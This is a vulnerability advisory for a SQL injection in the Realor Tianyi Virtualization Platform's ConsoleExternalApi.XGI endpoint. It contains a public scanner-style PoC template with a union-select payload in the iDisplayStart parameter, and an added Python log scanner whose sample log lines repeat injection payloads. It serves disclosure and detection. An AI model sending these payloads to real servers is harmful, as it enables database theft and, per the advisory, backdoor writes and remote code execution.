realor-console-external-api-xgi-sqli: Realor Tianyi Virtualization Platform ConsoleExternalApi.XGI interface SQL injection

Date: 2025-09-01 | Affected software: Realor Tianyi Virtualization Platform | PoC: public

Vulnerability description

The ConsoleExternalApi.XGI interface of the Tianyi virtualization platform is vulnerable to SQL injection: an attacker can read sensitive data from the database and write a backdoor file to achieve remote code execution (RCE).

PoC code [public]

id: realor-console-external-api-xgi-sqli

info:
  name: 瑞友天翼虚拟化平台ConsoleExternalApi.XGI接口SQL注入
  author: clearx
  severity: high
  verified: true
  description: |
    天翼虚拟化平台ConsoleExternalApi.XGI接口存在SQL注入,攻击者可获取数据库敏感信息,写入后门文件实现rce。
  reference:
    - https://mp.weixin.qq.com/s/XFEqd3YdeQGY9Si08Rv1yg
    - https://mp.weixin.qq.com/s/vGzEkgiEx-4Ojrhm5REtfQ

set:
  sqlinject-poc: "1+union+select+1,2,3,4,5,user()%23"

rules:
  r0:
    request:
      method: GET
      path: /ConsoleExternalApi.XGI?key=inner&initParams=command_getAppVisitLogByDataTable__user_admin__pwd_xxx__serverIdStr_1&sign=0a3d5f4f69628f32217ea9704d12bd6d&iDisplayStart={{sqlinject-poc}}
    expression: response.status == 200 &&
      response.body.bcontains(b'iTotalRecords') &&
      response.body.bcontains(b'iTotalDisplayRecords')

expression: r0()
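The template above matches on a GET to /ConsoleExternalApi.XGI whose iDisplayStart parameter carries a SQL payload instead of the integer paging offset the endpoint expects. For defenders, the same fact gives a cheap log-based detection: any request to that endpoint where iDisplayStart is not a plain non-negative integer is worth an alert, whichever payload is used. The following is an added example, not part of the advisory or of any Realor code. It assumes web server access logs in the common log format (the sample lines below are constructed), that the endpoint path may be matched case-insensitively, and that legitimate iDisplayStart values are always plain digits (a DataTables-style paging offset); adjust those assumptions to your environment.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (common log format); not taken from the advisory.
# Line 1: benign paging request. Lines 2-3: non-numeric iDisplayStart on the endpoint.
# Line 4: non-numeric iDisplayStart on an unrelated path (must NOT be flagged).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Sep/2025:10:00:01 +0800] "GET /ConsoleExternalApi.XGI?key=inner&initParams=command_getAppVisitLogByDataTable__user_admin__pwd_xxx__serverIdStr_1&sign=0a3d5f4f69628f32217ea9704d12bd6d&iDisplayStart=0 HTTP/1.1" 200 512
10.0.0.9 - - [01/Sep/2025:10:00:07 +0800] "GET /ConsoleExternalApi.XGI?key=inner&initParams=command_getAppVisitLogByDataTable__user_admin__pwd_xxx__serverIdStr_1&sign=0a3d5f4f69628f32217ea9704d12bd6d&iDisplayStart=1+union+select+1,2,3,4,5,user()%23 HTTP/1.1" 200 734
10.0.0.9 - - [01/Sep/2025:10:00:09 +0800] "GET /consoleexternalapi.xgi?key=inner&iDisplayStart=1%20or%201%3d1 HTTP/1.1" 200 734
10.0.0.7 - - [01/Sep/2025:10:00:12 +0800] "GET /index.html?iDisplayStart=abc HTTP/1.1" 200 1024
"""

# Common log format: ip ident user [timestamp] "METHOD target PROTOCOL" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

ENDPOINT_SUFFIX = "/consoleexternalapi.xgi"  # compared case-insensitively (assumption)


def suspicious_display_start(target: str):
    """Return the decoded iDisplayStart value if `target` hits the endpoint with a
    non-integer paging offset, otherwise None.

    parse_qs performs URL decoding ('+' -> space, %xx -> byte), so the check runs
    on the value the server would actually see, not on the raw encoded text.
    """
    parts = urlsplit(target)
    if not parts.path.lower().endswith(ENDPOINT_SUFFIX):
        return None
    for value in parse_qs(parts.query, keep_blank_values=True).get("iDisplayStart", []):
        if not value.isdigit():  # legitimate offsets are plain digits (assumption)
            return value
    return None


def is_suspicious_request(target: str) -> bool:
    """Boolean convenience wrapper around suspicious_display_start()."""
    return suspicious_display_start(target) is not None


def scan_log(text: str):
    """Parse each log line and collect alerts for suspicious endpoint requests."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # unparseable line; a real pipeline would count these
        value = suspicious_display_start(m.group("target"))
        if value is not None:
            hits.append({
                "ip": m.group("ip"),
                "timestamp": m.group("ts"),
                "status": int(m.group("status")),
                "value": value,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['timestamp']} {hit['ip']} status={hit['status']} iDisplayStart={hit['value']!r}")
```

Running it on the constructed sample flags the two requests from 10.0.0.9 and ignores the benign paging request and the unrelated /index.html line. Because the rule keys on the parameter's type rather than on specific keywords, it also catches payloads that differ from the public PoC string; pair it with blocking or rate-limiting of the endpoint at the edge until a vendor fix is applied, and keep the 200-status check from the template in mind when tuning (the injection returns the normal DataTables JSON, so status alone is not a signal).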